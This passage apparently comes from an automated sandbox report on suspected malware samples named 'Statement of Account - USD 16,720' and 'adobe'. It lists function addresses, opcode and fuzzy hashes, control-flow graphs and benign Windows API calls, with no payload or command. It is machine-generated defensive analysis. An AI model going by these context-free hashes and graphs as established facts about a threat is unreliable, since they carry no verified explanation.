                                                  • Instruction Fuzzy Hash: 9401D131B000100FDB60EA29E858B6A77D5EBCA728F108838F20AC7354DE21DC02C781
                                                  Function 067B60B9 Relevance: .0, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0d4dad52f747da0feb587566b9e74923b2b20a812393724feba06b18b0d753ae
                                                  • Instruction ID: 57cabd16e48183923c69ac37beb6d77eb4e24abc3a06b736aa412eea055dd634
                                                  • Opcode Fuzzy Hash: 0d4dad52f747da0feb587566b9e74923b2b20a812393724feba06b18b0d753ae
                                                  • Instruction Fuzzy Hash: 1AF02B31E2C34CABEB20CE75C809BAEB758DB42218F20C9A5F604DB181D177CA01DB80
                                                  Function 067B60C8 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12f701c29e7df930c5f6445dbfbe766566433816420c95a2ddc918d15dbbb174
                                                  • Instruction ID: 7abf307b405b8c168b5650d06250fc8901bfcf8f97542d6b7923b6241bcc77b9
                                                  • Opcode Fuzzy Hash: 12f701c29e7df930c5f6445dbfbe766566433816420c95a2ddc918d15dbbb174
                                                  • Instruction Fuzzy Hash: 8AE0C271E2011CABEF10CEB1C905BAEB3ACE702208F20C8A5DA08C7241E177CA01D380

                                                  Non-executed Functions

                                                  Function 067B72E8 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-2843079600
                                                  • Opcode ID: dad649a4b1a05318b9f5663b4c0b105b7201cdf35c9e003abf9013239c8df33f
                                                  • Instruction ID: 78567c775c5bb7df61c94f8b4b17879e95acf1770b641fbdfa6320851bce4ba0
                                                  • Opcode Fuzzy Hash: dad649a4b1a05318b9f5663b4c0b105b7201cdf35c9e003abf9013239c8df33f
                                                  • Instruction Fuzzy Hash: A5121B30E002198FDB68DF79C994BADB7B2BF89304F209969D409AB265DB349D45CF81
                                                  Function 067BA580 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-1273862796
                                                  • Opcode ID: b92253f16d1a2bcd2242d08d23600fa95d5e9e638f477d92c936e88f74b1a64a
                                                  • Instruction ID: b1d509fbdaf0ca985f903bf681658ee1b4181fda6d96e649c31fd81d4fac95fc
                                                  • Opcode Fuzzy Hash: b92253f16d1a2bcd2242d08d23600fa95d5e9e638f477d92c936e88f74b1a64a
                                                  • Instruction Fuzzy Hash: B9919030E00209DFEB68EF68D984BBE7BF6EF84304F109529E40197695DB749D46CB90
                                                  Function 067B6CE8 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-981061697
                                                  • Opcode ID: 239485c65bca079b016a52a4d34942044aa786f269c8a24bf9a27ddfcb1a458f
                                                  • Instruction ID: c78d7e764cad8faa89a314eae86e0ceea639fd94005b2bfe549398af93e6f52c
                                                  • Opcode Fuzzy Hash: 239485c65bca079b016a52a4d34942044aa786f269c8a24bf9a27ddfcb1a458f
                                                  • Instruction Fuzzy Hash: 39F14D30A00208CFDB59EBA8D994BAEB7B6BF85304F248529E4059B799DF35DC46DF40
                                                  Function 067BBA58 Relevance: 7.7, Strings: 6, Instructions: 197COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-3723351465
                                                  • Opcode ID: a6b0ba8f0b9df349ea90b6f5ab34f93bec1fc22bc069ddb366f55f00c84a557b
                                                  • Instruction ID: 61db61aa128405b4226e5e18d5eacb0e2b213d6a148ad1c0f5c03c08dc89afd4
                                                  • Opcode Fuzzy Hash: a6b0ba8f0b9df349ea90b6f5ab34f93bec1fc22bc069ddb366f55f00c84a557b
                                                  • Instruction Fuzzy Hash: D171B131E002098FDB68CF68D994BADB7B6EF84B00F209929D806DB254DF70DD45CB81
                                                  Function 067B8018 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
                                                  • Opcode ID: 10734faa0782c7ea550f575e6496d75714a0cc23d088d7e8b5f121967be40d3c
                                                  • Instruction ID: 81ee22df08a6c936f47fa7181ba56c92ce8565f1e57fbada372d82fe5b50452c
                                                  • Opcode Fuzzy Hash: 10734faa0782c7ea550f575e6496d75714a0cc23d088d7e8b5f121967be40d3c
                                                  • Instruction Fuzzy Hash: 70B15B30A10208CFDB68EFB9C9947AEB7B6EF84304F248529D4059B395DB75DC86CB81
                                                  Function 067B8430 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR]q$LR]q$$]q$$]q
                                                  • API String ID: 0-3527005858
                                                  • Opcode ID: e2f871696f28a63a44d8ef5acbd80c4e7d7317895b4c607a551a2e1002f859b8
                                                  • Instruction ID: 4be92d33c12cc755a210c9446169bc7ac8c8962238035cc4edbbe62a7be66ca0
                                                  • Opcode Fuzzy Hash: e2f871696f28a63a44d8ef5acbd80c4e7d7317895b4c607a551a2e1002f859b8
                                                  • Instruction Fuzzy Hash: CE51B330B002059FDB68DF28D985BAA77FAFF85304F149569E4069B399DB30EC45CB91
                                                  Function 067BA903 Relevance: 5.2, Strings: 4, Instructions: 162COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4499693634.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_67b0000_Statement of Account - USD 16,720.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
                                                  • Opcode ID: 0337247c74b7d4f9516ed48230d2425d58ffcd726434afafd147793954a226a3
                                                  • Instruction ID: 57874e53af03b1098dbc0e4fb9b8a274f736f1159df6876e1a7a77087a50b3b8
                                                  • Opcode Fuzzy Hash: 0337247c74b7d4f9516ed48230d2425d58ffcd726434afafd147793954a226a3
                                                  • Instruction Fuzzy Hash: DD51BE30E102088FDF65EB68DA80BEEB7B2EF85300F10952AE80597355DB35EC41DB90

                                                  Execution Graph

                                                  Execution Coverage:9%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:34
                                                  Total number of Limit Nodes:5
                                                  execution_graph 14724 273d460 14725 273d464 DuplicateHandle 14724->14725 14726 273d4f6 14725->14726 14727 273ad68 14730 273ae50 14727->14730 14728 273ad77 14731 273ae94 14730->14731 14732 273ae71 14730->14732 14731->14728 14732->14731 14733 273b098 GetModuleHandleW 14732->14733 14734 273b0c5 14733->14734 14734->14728 14735 2734668 14736 273467a 14735->14736 14737 2734686 14736->14737 14739 2734779 14736->14739 14740 273479d 14739->14740 14744 2734878 14740->14744 14748 2734888 14740->14748 14746 2734888 14744->14746 14745 273498c 14745->14745 14746->14745 14752 2734248 14746->14752 14750 27348af 14748->14750 14749 273498c 14749->14749 14750->14749 14751 2734248 CreateActCtxA 14750->14751 14751->14749 14753 2735918 CreateActCtxA 14752->14753 14755 27359db 14753->14755 14756 273d218 14757 273d25e GetCurrentProcess 14756->14757 14759 273d2b0 GetCurrentThread 14757->14759 14760 273d2a9 14757->14760 14761 273d2e6 14759->14761 14762 273d2ed GetCurrentProcess 14759->14762 14760->14759 14761->14762 14765 273d323 14762->14765 14763 273d34b GetCurrentThreadId 14764 273d37c 14763->14764 14765->14763

                                                  Executed Functions

                                                  Function 0273D208 Relevance: 6.1, APIs: 4, Instructions: 131threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 294 273d208-273d2a7 GetCurrentProcess 298 273d2b0-273d2e4 GetCurrentThread 294->298 299 273d2a9-273d2af 294->299 300 273d2e6-273d2ec 298->300 301 273d2ed-273d321 GetCurrentProcess 298->301 299->298 300->301 303 273d323-273d329 301->303 304 273d32a-273d345 call 273d3e7 301->304 303->304 307 273d34b-273d37a GetCurrentThreadId 304->307 308 273d383-273d3e5 307->308 309 273d37c-273d382 307->309 309->308
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 0273D296
                                                  • GetCurrentThread.KERNEL32 ref: 0273D2D3
                                                  • GetCurrentProcess.KERNEL32 ref: 0273D310
                                                  • GetCurrentThreadId.KERNEL32 ref: 0273D369
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159823673.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2730000_adobe.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: f9fe12f66c19db9c7f88b988885095687e193568144f6d2bd93e7aeb297cff1b
                                                  • Instruction ID: 33674e938a62b8349171bb755551e5c58f6cd34da9002a076339c5be9b47d45c
                                                  • Opcode Fuzzy Hash: f9fe12f66c19db9c7f88b988885095687e193568144f6d2bd93e7aeb297cff1b
                                                  • Instruction Fuzzy Hash: 025179B0900249DFDB15DFA9D948BAEBBF1FF48304F208459E419A7361D738A944CB66
                                                  Function 0273D218 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 316 273d218-273d2a7 GetCurrentProcess 320 273d2b0-273d2e4 GetCurrentThread 316->320 321 273d2a9-273d2af 316->321 322 273d2e6-273d2ec 320->322 323 273d2ed-273d321 GetCurrentProcess 320->323 321->320 322->323 325 273d323-273d329 323->325 326 273d32a-273d345 call 273d3e7 323->326 325->326 329 273d34b-273d37a GetCurrentThreadId 326->329 330 273d383-273d3e5 329->330 331 273d37c-273d382 329->331 331->330
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 0273D296
                                                  • GetCurrentThread.KERNEL32 ref: 0273D2D3
                                                  • GetCurrentProcess.KERNEL32 ref: 0273D310
                                                  • GetCurrentThreadId.KERNEL32 ref: 0273D369
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159823673.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2730000_adobe.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 66dd44bf6c647007e5af2a50ca1f0d94665dc30f04d30889ba9534aa4757efea
                                                  • Instruction ID: baff058d4a8f345bcaa1383465b6212a573d0174f4dedabcbc096cfeab173ec4
                                                  • Opcode Fuzzy Hash: 66dd44bf6c647007e5af2a50ca1f0d94665dc30f04d30889ba9534aa4757efea
                                                  • Instruction Fuzzy Hash: 0A5157B0900209DFDB24DFAAD948BAEBBF1FF48304F208459E419A7351D738A944CF66
                                                  Function 0273AE50 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 361 273ae50-273ae6f 362 273ae71-273ae7e call 2739dc0 361->362 363 273ae9b-273ae9f 361->363 368 273ae80 362->368 369 273ae94 362->369 365 273aeb3-273aef4 363->365 366 273aea1-273aeab 363->366 372 273af01-273af0f 365->372 373 273aef6-273aefe 365->373 366->365 418 273ae86 call 273b4e9 368->418 419 273ae86 call 273b4f8 368->419 420 273ae86 call 273b4c8 368->420 369->363 374 273af33-273af35 372->374 375 273af11-273af16 372->375 373->372 380 273af38-273af3f 374->380 377 273af21 375->377 378 273af18-273af1f call 2739dcc 375->378 376 273ae8c-273ae8e 376->369 379 273afd0-273b04e 376->379 382 273af23-273af31 377->382 378->382 411 273b050-273b053 379->411 412 273b054-273b090 379->412 383 273af41-273af49 380->383 384 273af4c-273af53 380->384 382->380 383->384 386 273af60-273af69 call 2739ddc 384->386 387 273af55-273af5d 384->387 392 273af76-273af7b 386->392 393 273af6b-273af73 386->393 387->386 394 273af99-273afa6 392->394 395 273af7d-273af84 392->395 393->392 402 273afc9-273afcf 394->402 403 273afa8-273afc6 394->403 395->394 397 273af86-273af96 call 2739dec call 2739dfc 395->397 397->394 403->402 411->412 413 273b092-273b095 412->413 414 273b098-273b0c3 GetModuleHandleW 412->414 413->414 415 273b0c5-273b0cb 414->415 416 273b0cc-273b0e0 414->416 415->416 418->376 419->376 420->376
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0273B0B6
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159823673.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2730000_adobe.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: d41738ac908fae3da4d9bcc140e326ff009c413c9c4044ef12da28a570604328
                                                  • Instruction ID: 6e2c191d510b2a10b4595895bd452050a23f6ee47917303c507264f3b9a9b82f
                                                  • Opcode Fuzzy Hash: d41738ac908fae3da4d9bcc140e326ff009c413c9c4044ef12da28a570604328
                                                  • Instruction Fuzzy Hash: B08166B0A00B468FD725DF2AD14675ABBF1FF88304F00892DD08AD7A51DB79E849CB90
                                                  Function 02734248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 421 2734248-27359d9 CreateActCtxA 424 27359e2-2735a3c 421->424 425 27359db-27359e1 421->425 432 2735a4b-2735a4f 424->432 433 2735a3e-2735a41 424->433 425->424 434 2735a51-2735a5d 432->434 435 2735a60 432->435 433->432 434->435 437 2735a61 435->437 437->437
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 027359C9
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159823673.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2730000_adobe.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: a73cae270e1466d6b853ccf662ae76b1ac1c9dcde5bd1c8eb523351d00bf594f
                                                  • Instruction ID: 1ab603c365f9211d81011bde200a77de7c4c4c6a02df5841e1c80da3ba753374
                                                  • Opcode Fuzzy Hash: a73cae270e1466d6b853ccf662ae76b1ac1c9dcde5bd1c8eb523351d00bf594f
                                                  • Instruction Fuzzy Hash: 7241D1B0C0061DCBDB25DFA9C884B9DBBF5FF48308F60806AD418AB255DB75694ACF90
                                                  Function 0273590D Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 438 273590d-2735912 439 273591c-27359d9 CreateActCtxA 438->439 441 27359e2-2735a3c 439->441 442 27359db-27359e1 439->442 449 2735a4b-2735a4f 441->449 450 2735a3e-2735a41 441->450 442->441 451 2735a51-2735a5d 449->451 452 2735a60 449->452 450->449 451->452 454 2735a61 452->454 454->454
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 027359C9
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159823673.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2730000_adobe.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 3016c281d508aa8712393a07aeb5c3004f233557557a5cc36380937ac0a098dd
                                                  • Instruction ID: eef3bdf8aac146ea0773b40b86f1bee3d8be225e746ba1f8761ef18d32f3fbfa
                                                  • Opcode Fuzzy Hash: 3016c281d508aa8712393a07aeb5c3004f233557557a5cc36380937ac0a098dd
                                                  • Instruction Fuzzy Hash: 8941FFB0C00619CBDB25DFA9C884BDDBBF5BF48308F60806AD418BB255DB75694ACF90
                                                  Function 0273D458 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 455 273d458-273d45e 456 273d460-273d463 455->456 457 273d464-273d4f4 DuplicateHandle 455->457 456->457 458 273d4f6-273d4fc 457->458 459 273d4fd-273d51a 457->459 458->459
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0273D4E7
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159823673.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2730000_adobe.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 331a4060f7bc4d3059e83598f87e270b3d06debec0e966e92777a32b347373ba
                                                  • Instruction ID: adc129d754e52feab3fe0f4d535335e6d6c78d152f2d77bbf08d95c38fa80ab7
                                                  • Opcode Fuzzy Hash: 331a4060f7bc4d3059e83598f87e270b3d06debec0e966e92777a32b347373ba
                                                  • Instruction Fuzzy Hash: E92105B5900208EFDB10CF9AD584ADEBBF8FB48324F10801AE958A3211D378A944CFA1
                                                  Function 0273D460 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 462 273d460-273d4f4 DuplicateHandle 464 273d4f6-273d4fc 462->464 465 273d4fd-273d51a 462->465 464->465
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0273D4E7
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159823673.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2730000_adobe.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 693d9c3feedc1d66d7595b2bc9ef3a126215ad3976556a4f3195dc80ae28b96d
                                                  • Instruction ID: f830433e1a330af75346e6b2ce4bae35ca68d75bdcec11b3d225481f78f42f32
                                                  • Opcode Fuzzy Hash: 693d9c3feedc1d66d7595b2bc9ef3a126215ad3976556a4f3195dc80ae28b96d
                                                  • Instruction Fuzzy Hash: BA21F5B59002499FDB10CF9AD584ADEFFF8FB48324F14841AE918A3350D378A940CFA1
                                                  Function 0273B050 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 468 273b050-273b090 470 273b092-273b095 468->470 471 273b098-273b0c3 GetModuleHandleW 468->471 470->471 472 273b0c5-273b0cb 471->472 473 273b0cc-273b0e0 471->473 472->473
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0273B0B6
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159823673.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_2730000_adobe.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: f534fa33d95d3342a58d5f736f67d0b077bc6dcd79a19f37bdb940f2a9fd91cb
                                                  • Instruction ID: ac7b4af6e726caedf6e63a9fe9f6dee51567d37df269e994a5c235a9d62d23ad
                                                  • Opcode Fuzzy Hash: f534fa33d95d3342a58d5f736f67d0b077bc6dcd79a19f37bdb940f2a9fd91cb
                                                  • Instruction Fuzzy Hash: AE11DFB5C003498FDB20DF9AC444A9EFBF4AF89228F10846AD469B7611D379A545CFA1
                                                  Function 00EBD4C4 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159355862.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_ebd000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2b91f11337844a59d62370c135289ef7fc5127645b641543dcc1dbb5ec6fd00d
                                                  • Instruction ID: e0c1715714a1669a721d0614f16c0a1258c84d5792c0e8e8c3c60e68a0269516
                                                  • Opcode Fuzzy Hash: 2b91f11337844a59d62370c135289ef7fc5127645b641543dcc1dbb5ec6fd00d
                                                  • Instruction Fuzzy Hash: D6213071508200DFCB25DF14D9C0FA7BF65FB98328F20C569E9092B256D33AD816CAA2
                                                  Function 00EBD3D8 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159355862.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_ebd000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f35135d14c3c9ceb26a569934ad60eaca1aa3d6df9588b007725c6aed2a55d84
                                                  • Instruction ID: 91f45b73ef432a4aff5544d4307d90bce31aff06b4076fd2b69a3d4df4d89ac5
                                                  • Opcode Fuzzy Hash: f35135d14c3c9ceb26a569934ad60eaca1aa3d6df9588b007725c6aed2a55d84
                                                  • Instruction Fuzzy Hash: D1213371108204DFCB05DF14C9C0BA7BF65FB98324F20C569E9095B256D33AE816CAA2
                                                  Function 0267D01C Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159469174.000000000267D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0267D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_267d000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5ea168205ecca937218e75c8766ad2a096b5523ba16824a3864cf4f2c240e070
                                                  • Instruction ID: 1445136d5e0cac26a30469e9d4a8d196e9587d1f0afdec7db75584c350dcc365
                                                  • Opcode Fuzzy Hash: 5ea168205ecca937218e75c8766ad2a096b5523ba16824a3864cf4f2c240e070
                                                  • Instruction Fuzzy Hash: 0821F275604284DFDB14DF24E984B26BF65FF88314F24C96DD90A4B396C33AD447CA61
                                                  Function 0267D006 Relevance: .1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159469174.000000000267D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0267D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_267d000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a280a4fd0e67636db21dbf0599cb9f2e7f05ab045fb7704d9116f6f7eaabf6fb
                                                  • Instruction ID: f04aa9a304ee00677ed5eebb550e59f0af810d96ef68a230a77dee3cf413fa1c
                                                  • Opcode Fuzzy Hash: a280a4fd0e67636db21dbf0599cb9f2e7f05ab045fb7704d9116f6f7eaabf6fb
                                                  • Instruction Fuzzy Hash: 242181755093C08FDB12CF24D994715BF71EF46214F28C5DAD8898F6A7C33A981ACB62
                                                  Function 00EBD4BF Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159355862.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_ebd000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction ID: ac58690e9d64759f10eb57f3df0d3cd5b484eb8b0cf61ea409a646d6ac2c5aaa
                                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction Fuzzy Hash: A6112672404280CFCB12CF10D9C4B56BF71FB98328F24C6A9D9490B256C33AD85ACBA2
                                                  Function 00EBD3D3 Relevance: .1, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2159355862.0000000000EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EBD000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_ebd000_adobe.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction ID: 1d81733299829641e8821038396d005eb04d8f691dc79565d7da5d1df5801a6f
                                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction Fuzzy Hash: AC112672404240CFCB12CF00D9C4B56BF71FB94324F24C6A9D9090B256C33AE85ACBA2

                                                  Execution Graph

                                                  Execution Coverage:7.7%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:19
                                                  Total number of Limit Nodes:4
